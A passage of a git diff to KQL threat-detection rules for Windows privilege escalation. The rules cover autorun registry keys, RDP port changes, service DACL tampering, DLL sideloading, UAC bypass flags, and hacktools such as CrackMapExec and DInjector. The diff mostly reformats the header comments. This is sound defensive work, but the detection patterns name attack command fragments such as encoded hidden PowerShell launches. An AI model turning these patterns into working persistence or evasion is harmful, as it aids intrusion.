"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql index 0d736142..72ecc7e3 100644 --- a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: CurrentVersion NT Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: CurrentVersion NT Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and (not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql index 202b8146..3ff58c13 100644 --- a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql +++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql @@ -1,12 +1,12 @@ -// Title: Default RDP Port Changed to Non Standard Port -// Author: frack113 -// Date: 2022-01-01 -// Level: high -// Description: Detects changes to the default RDP port. -// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. -// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 - -DeviceRegistryEvents +// Title: Default RDP Port Changed to Non Standard Port +// Author: frack113 +// Date: 2022-01-01 +// Level: high +// Description: Detects changes to the default RDP port. +// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. +// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents | where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql index 09dc828f..22afb0d3 100644 --- a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql +++ b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql @@ -1,10 +1,10 @@ -// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE -// Author: Jonhnathan Ribeiro, oscd.community -// Date: 2020-10-16 -// Level: high -// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 - -DeviceProcessEvents +// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Jonhnathan Ribeiro, oscd.community +// Date: 2020-10-16 +// Level: high +// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents | where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql index 946328a1..1f454f54 100644 --- a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql +++ b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql @@ -1,10 +1,10 @@ -// Title: DHCP Callout DLL Installation -// Author: Dimitrios Slamaris -// Date: 2017-05-15 -// Level: high -// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 - -DeviceRegistryEvents +// Title: DHCP Callout DLL Installation +// Author: Dimitrios Slamaris +// Date: 2017-05-15 +// Level: high +// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql index 88473e7c..2b5db063 100644 --- a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql @@ -1,14 +1,14 @@ -// Title: Direct Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2019-10-25 -// Level: medium -// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. -// - Legitimate administrator sets up autorun keys for legitimate reasons. -// - Discord - -DeviceProcessEvents +// Title: Direct Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-10-25 +// Level: medium +// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. +// - Legitimate administrator sets up autorun keys for legitimate reasons. +// - Discord + +DeviceProcessEvents | where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql index 0e1002a7..1aafa254 100644 --- a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql +++ b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql @@ -1,10 +1,10 @@ -// Title: DLL Execution Via Register-cimprovider.exe -// Author: Ivan Dyachkov, Yulia Fomina, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: Detects using register-cimprovider.exe to execute arbitrary dll file. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574 - -DeviceProcessEvents +// Title: DLL Execution Via Register-cimprovider.exe +// Author: Ivan Dyachkov, Yulia Fomina, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects using register-cimprovider.exe to execute arbitrary dll file. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574 + +DeviceProcessEvents | where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql index d26ddbe1..01fa09f5 100644 --- a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql +++ b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql @@ -1,10 +1,10 @@ -// Title: DLL Load via LSASS -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-16 -// Level: high -// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008 - -DeviceRegistryEvents +// Title: DLL Load via LSASS +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-16 +// Level: high +// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008 + +DeviceRegistryEvents | where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql index a5b34511..e57b28c5 100644 --- a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql +++ b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql @@ -1,12 +1,12 @@ -// Title: DLL Sideloading by VMware Xfer Utility -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-02 -// Level: high -// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DLL Sideloading by VMware Xfer Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql index 4b644c9b..7d169368 100644 --- a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql +++ b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql @@ -1,12 +1,12 @@ -// Title: Dllhost.EXE Execution Anomaly -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-27 -// Level: high -// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Dllhost.EXE Execution Anomaly +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-27 +// Level: high +// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql index 9e503e72..984523a4 100644 --- a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql +++ b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql @@ -1,13 +1,13 @@ -// Title: Explorer NOUACCHECK Flag -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-23 -// Level: high -// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 -// False Positives: -// - Domain Controller User Logon -// - Unknown how many legitimate software products use that method - -DeviceProcessEvents +// Title: Explorer NOUACCHECK Flag +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: high +// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Domain Controller User Logon +// - Unknown how many legitimate software products use that method + +DeviceProcessEvents | where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql index 2740394f..0a56d66a 100644 --- a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql +++ b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql @@ -1,12 +1,12 @@ -// Title: Fax Service DLL Search Order Hijack -// Author: NVISO -// Date: 2020-05-04 -// Level: high -// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Fax Service DLL Search Order Hijack +// Author: NVISO +// Date: 2020-05-04 +// Level: high +// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql index 1f45d537..676a4a8b 100644 --- a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql +++ b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql @@ -1,10 +1,10 @@ -// Title: File Creation In Suspicious Directory By Msdt.EXE -// Author: Vadim Varganov, Florian Roth (Nextron Systems) -// Date: 2022-08-24 -// Level: high -// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190 - -DeviceFileEvents +// Title: File Creation In Suspicious Directory By Msdt.EXE +// Author: Vadim Varganov, Florian Roth (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql index e5cb3b0a..20f6e7b1 100644 --- a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql +++ b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql @@ -1,10 +1,10 @@ -// Title: Guest Account Enabled Via Sysadminctl -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-02-18 -// Level: low -// Description: Detects attempts to enable the guest account using the sysadminctl utility -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001 - -DeviceProcessEvents +// Title: Guest Account Enabled Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: low +// Description: Detects attempts to enable the guest account using the sysadminctl utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql index deb09d0a..bceef24b 100644 --- a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql +++ b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql @@ -1,10 +1,10 @@ -// Title: HackTool - CrackMapExec Execution Patterns -// Author: Thomas Patzke -// Date: 2020-05-22 -// Level: high -// Description: Detects various execution patterns of the CrackMapExec pentesting framework -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106 - -DeviceProcessEvents +// Title: HackTool - CrackMapExec Execution Patterns +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: Detects various execution patterns of the CrackMapExec pentesting framework +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106 + +DeviceProcessEvents | where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc " \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql index ebb9ab75..c43dbd26 100644 --- a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - DInjector PowerShell Cradle Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-12-07 -// Level: critical -// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - DInjector PowerShell Cradle Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-07 +// Level: critical +// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql index 8dd598e6..0e972750 100644 --- a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql @@ -1,11 +1,11 @@ -// Title: HackTool - HollowReaper Execution -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-01 -// Level: high -// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. -// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012 - -DeviceProcessEvents +// Title: HackTool - HollowReaper Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-01 +// Level: high +// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. +// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012 + +DeviceProcessEvents | where FolderPath endswith "\\HollowReaper.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql index 492ddb5b..d9676e34 100644 --- a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Impersonate Execution -// Author: Sai Prashanth Pulisetti @pulisettis -// Date: 2022-12-21 -// Level: medium -// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 - -DeviceProcessEvents +// Title: HackTool - Impersonate Execution +// Author: Sai Prashanth Pulisetti @pulisettis +// Date: 2022-12-21 +// Level: medium +// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql index af05ec45..58362b4a 100644 --- a/KQL/rules/Privilege 